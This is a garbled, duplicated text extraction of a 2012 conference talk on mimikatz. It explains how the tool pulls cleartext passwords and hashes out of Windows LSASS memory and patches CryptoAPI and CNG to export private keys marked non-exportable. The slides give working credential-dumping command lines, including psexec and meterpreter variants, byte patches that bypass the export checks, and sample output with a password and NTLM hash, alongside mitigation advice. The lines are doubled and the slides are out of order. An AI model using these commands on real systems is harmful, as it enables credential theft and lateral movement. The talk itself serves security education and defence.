Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
